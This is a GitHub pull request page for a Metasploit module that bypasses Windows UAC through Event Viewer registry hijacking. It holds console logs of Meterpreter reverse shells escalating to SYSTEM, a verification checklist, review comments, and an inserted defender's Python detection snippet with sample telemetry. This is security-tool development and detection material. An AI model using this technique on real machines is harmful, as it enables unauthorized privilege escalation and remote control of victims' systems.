
Add bypass UAC via Event Viewer module #7532

Merged
merged 6 commits into from
Dec 1, 2016

Conversation

OJ
Contributor

@OJ OJ commented Nov 4, 2016

This PR provides a new module that implements more bypass UAC functionality, this time via the Event Viewer. The original research was done by @enigma0x3 and @mattifestation, and this module does everything that they did but in Ruby/MSF-land (full kudos for the work goes to them).

Details of the research can be found here: https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/

The module should work with any combination of shell arch vs target arch. That is, you can run 32-bit payloads from a 64-bit session and vice-versa. The module has been tested on a fully patched Windows 10 installation.

Notes

This module has been written to make use of the changes made in #7507. This is because a bunch of arch/platform refactors were done, and I didn't want to add more work that needed to be merged after. Hence, it's important that #7507 gets landed before this is looked at.

As a result, the Travis build for this module will fail. When the PR is landed, this should go nicely green. I'll mark this as delayed for now, but is still up for review.

Sample runs

msf exploit(bypassuac_eventvwr) > sessions

Active sessions
===============

  Id  Type                     Information                           Connection
  --  ----                     -----------                           ----------
  3   meterpreter x64/windows  DESKTOP-5A73R51\oj @ DESKTOP-5A73R51  x.x.x.x:5005 -> x.x.x.x:50015 (x.x.x.x)
  4   meterpreter x86/windows  DESKTOP-5A73R51\oj @ DESKTOP-5A73R51  x.x.x.x:5000 -> x.x.x.x:50016 (x.x.x.x)

msf exploit(bypassuac_eventvwr) > sess 3
[*] Starting interaction with 3...

meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: The environment is incorrect. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
meterpreter > background
[*] Backgrounding session 3...
msf exploit(bypassuac_eventvwr) > sess 4
[*] Starting interaction with 4...

meterpreter > getsystem
[-] priv_elevate_getsystem: Operation failed: The environment is incorrect. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
meterpreter > background
[*] Backgrounding session 4...
msf exploit(bypassuac_eventvwr) > set session 3
session => 3
msf exploit(bypassuac_eventvwr) > run

[*] [2016.11.05-04:40:03] Started reverse TCP handler on x.x.x.x:4444
[*] [2016.11.05-04:40:05] UAC is Enabled, checking level...
[+] [2016.11.05-04:40:05] Part of Administrators group! Continuing...
[+] [2016.11.05-04:40:05] UAC is set to Default
[+] [2016.11.05-04:40:05] BypassUAC can bypass this setting, continuing...
[*] [2016.11.05-04:40:06] Configuring payload and stager registry keys ...
[*] [2016.11.05-04:40:07] Executing payload: C:\Windows\SysWOW64\cmd.exe /c C:\Windows\System32\eventvwr.exe
[*] [2016.11.05-04:40:08] Sending stage (957487 bytes) to x.x.x.x
[*] Meterpreter session 5 opened (x.x.x.x:4444 -> x.x.x.x:58629) at 2016-11-05 04:40:10 +1000
[*] [2016.11.05-04:40:12] Cleaining up registry keys ...

meterpreter > getuid
Server username: DESKTOP-5A73R51\oj
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.16.255.131 - Meterpreter session 5 closed.  Reason: User exit
msf exploit(bypassuac_eventvwr) > set session 4
session => 4
msf exploit(bypassuac_eventvwr) > set target 1
target => 1
msf exploit(bypassuac_eventvwr) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf exploit(bypassuac_eventvwr) > run

[*] [2016.11.05-04:40:47] Started reverse TCP handler on x.x.x.x:4444
[*] [2016.11.05-04:40:50] UAC is Enabled, checking level...
[+] [2016.11.05-04:40:50] Part of Administrators group! Continuing...
[+] [2016.11.05-04:40:50] UAC is set to Default
[+] [2016.11.05-04:40:50] BypassUAC can bypass this setting, continuing...
[*] [2016.11.05-04:40:51] Configuring payload and stager registry keys ...
[*] [2016.11.05-04:40:51] Executing payload: C:\Windows\Sysnative\cmd.exe /c C:\Windows\System32\eventvwr.exe
[*] [2016.11.05-04:40:53] Sending stage (1189423 bytes) to x.x.x.x
[*] Meterpreter session 6 opened (x.x.x.x:4444 -> x.x.x.x:58645) at 2016-11-05 04:40:54 +1000
[*] [2016.11.05-04:40:57] Cleaining up registry keys ...

meterpreter > getuid
Server username: DESKTOP-5A73R51\oj
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > exit
[*] Shutting down Meterpreter...

[*] 172.16.255.131 - Meterpreter session 6 closed.  Reason: User exit

Verification

  • Create both x86 and x64 Windows meterp payloads.
  • Create both x86 and x64 handlers.
  • Launch the payloads as an admin user (but not elevated) on your OS of choice (7/2008 through 10/2012).
  • Validate that getsystem doesn't work on either session.
  • Configure the module to use a 32-bit payload.
  • Run the module on both low-priv sessions.
  • Confirm that new sessions are created and that getsystem executes successfully on both.
  • Configure the module to use a 64-bit payload.
  • Run the module on both low-priv sessions.
  • Confirm that new sessions are created and that getsystem executes successfully on both.
  • Confirm that when eventvwr is run after the payload is fired, the actual Event Viewer application opens and runs correctly.

This module was inspired by the work done by Matt Nelson and Matt Graeber who came up with the method in the first place. This works nicely on a fully patched Windows 10 at the time of writing.
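From the defender's side, the run above leaves two observable traces: a per-user `mscfile` handler being written (and later cleaned up), and `eventvwr.exe` being spawned by `cmd.exe /c`. The following is an added detection example, not code from this PR or from Metasploit; it assumes Sysmon-style event dicts, and the registry path comes from the linked enigma0x3 write-up rather than from this page's module source.

```python
import re

# Per-user handler key hijacked by the technique in the linked enigma0x3 write-up
# (taken from that research, not from the module source on this page).
MSCFILE_KEY = re.compile(r"\\Software\\Classes\\mscfile\\shell\\open\\command", re.I)


def detect(events):
    """Return alert strings for Sysmon-like event dicts (EventID 1 = process create,
    12 = registry key create/delete, 13 = registry value set)."""
    alerts = []
    for ev in events:
        eid = ev.get("EventID")
        if eid in (12, 13) and MSCFILE_KEY.search(ev.get("TargetObject", "")):
            # This key does not exist under HKU\<SID> on a clean box; both the write
            # and the module's later cleanup delete are worth surfacing.
            alerts.append(f"registry {ev.get('EventType', '?')} on {ev['TargetObject']} "
                          f"by {ev.get('Image', '?')}")
        elif eid == 1:
            image = ev.get("Image", "").lower()
            parent = ev.get("ParentImage", "").lower()
            if image.endswith("\\eventvwr.exe") and parent.endswith("\\cmd.exe"):
                # Matches the launch the module logs (cmd.exe /c eventvwr.exe);
                # Event Viewer is normally started by explorer.exe or mmc.exe.
                alerts.append(f"eventvwr.exe spawned by {ev['ParentImage']}")
    return alerts


# Constructed sample telemetry mirroring the run shown in the PR. The SID and the
# payload path are made up; cmd.exe/eventvwr.exe paths are the ones the module logged.
SID = "S-1-5-21-1111111111-2222222222-3333333333-1001"
PAYLOAD = "C:\\Users\\oj\\AppData\\Local\\Temp\\payload.exe"
SAMPLE = [
    {"EventID": 13, "EventType": "SetValue", "Image": PAYLOAD,
     "TargetObject": f"HKU\\{SID}\\Software\\Classes\\mscfile\\shell\\open\\command\\(Default)"},
    {"EventID": 1, "Image": "C:\\Windows\\SysWOW64\\cmd.exe", "ParentImage": PAYLOAD,
     "CommandLine": "C:\\Windows\\SysWOW64\\cmd.exe /c C:\\Windows\\System32\\eventvwr.exe"},
    {"EventID": 1, "Image": "C:\\Windows\\System32\\eventvwr.exe",
     "ParentImage": "C:\\Windows\\SysWOW64\\cmd.exe",
     "CommandLine": "C:\\Windows\\System32\\eventvwr.exe"},
    {"EventID": 12, "EventType": "DeleteKey", "Image": PAYLOAD,
     "TargetObject": f"HKU\\{SID}\\Software\\Classes\\mscfile\\shell\\open\\command"},
    # Benign: a user opening Event Viewer from the Start menu.
    {"EventID": 1, "Image": "C:\\Windows\\System32\\eventvwr.exe",
     "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": "C:\\Windows\\System32\\eventvwr.exe"},
]

if __name__ == "__main__":
    for line in detect(SAMPLE):
        print(line)
```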
@OJ OJ added module blocked Blocked by one or more additional tasks labels Nov 4, 2016
@h00die
Contributor

h00die commented Nov 13, 2016

This looks to be https://www.exploit-db.com/exploits/40268/ correct? Just tracking down any edb code that never got PRed

@OJ
Contributor Author

OJ commented Nov 13, 2016

@h00die no, I wrote my own from scratch. You'll notice that the module is out of date (uses Metasploit3), and takes a different approach in code. Seems to rely on its own web delivery of some kind, which doesn't make sense.

@bcook-r7
Contributor

Hi @OJ can you please rebase this on master now that #7507 is landed :)

@OJ
Contributor Author

OJ commented Nov 21, 2016

With pleasure!

@OJ OJ removed the blocked Blocked by one or more additional tasks label Nov 21, 2016
@wchen-r7 wchen-r7 self-assigned this Nov 28, 2016

# Validate that we can actually do things before we bother
# doing any more work
validate_environment!
Contributor


Hi @OJ, I believe you're missing the method for validate_environment!. Could you please add it? Thanks.

@OJ
Contributor Author

OJ commented Nov 30, 2016 via email

@wchen-r7
Contributor

Ah ok, thanks!

@OJ
Contributor Author

OJ commented Nov 30, 2016

msf exploit(bypassuac_eventvwr) > run

[*] [2016.12.01-08:01:22] Started HTTPS reverse handler on https://10.1.10.40:8888
[*] [2016.12.01-08:01:23] UAC is Enabled, checking level...
[+] [2016.12.01-08:01:23] Part of Administrators group! Continuing...
[+] [2016.12.01-08:01:23] UAC is set to Default
[+] [2016.12.01-08:01:23] BypassUAC can bypass this setting, continuing...
[*] [2016.12.01-08:01:23] Configuring payload and stager registry keys ...
[*] [2016.12.01-08:01:23] Executing payload: C:\Windows\SysWOW64\cmd.exe /c C:\Windows\System32\eventvwr.exe
[*] [2016.12.01-08:01:25] https://10.1.10.40:8888 handling request from 10.1.10.56; (UUID: gx5dgqed) Staging Native payload...
[*] Meterpreter session 2 opened (10.1.10.40:8888 -> 10.1.10.56:53881) at 2016-12-01 08:01:25 +1000
[*] [2016.12.01-08:01:28] Cleaining up registry keys ...

meterpreter > sysinfo
Computer        : DESKTOP-TF4F7AM
OS              : Windows 10 (Build 14393).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows

Should be good now!

@wchen-r7
Contributor

Thanks, I'm on it now :-)

@OJ
Contributor Author

OJ commented Nov 30, 2016

Thanks for chasing me up @wchen-r7 :)

@wchen-r7
Contributor

wchen-r7 commented Dec 1, 2016

Module works for me:

msf exploit(bypassuac_eventvwr) > run

[*] Started reverse TCP handler on 172.16.23.1:5555 
[*] UAC is Enabled, checking level...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] Configuring payload and stager registry keys ...
[*] Executing payload: C:\Windows\system32\cmd.exe /c C:\Windows\System32\eventvwr.exe
[*] Sending stage (957999 bytes) to 172.16.23.185
[*] Meterpreter session 10 opened (172.16.23.1:5555 -> 172.16.23.185:49162) at 2016-12-01 11:12:36 -0600
[*] Cleaining up registry keys ...

meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > 

And code looks nice. I'll merge it now. Thanks!

@wchen-r7 wchen-r7 merged commit ebf5121 into rapid7:master Dec 1, 2016
@wchen-r7
Contributor

wchen-r7 commented Dec 1, 2016

Release Notes

This is a local exploit module that allows you to bypass UAC via the Event Viewer. It works against a variety of Windows versions, from Windows 7 to Windows 10.

@enigma0x3

Awesome, thanks all!

@OJ
Contributor Author

OJ commented Dec 1, 2016 via email

@OJ OJ deleted the add-bypassuac-eventvwr branch June 16, 2017 06:46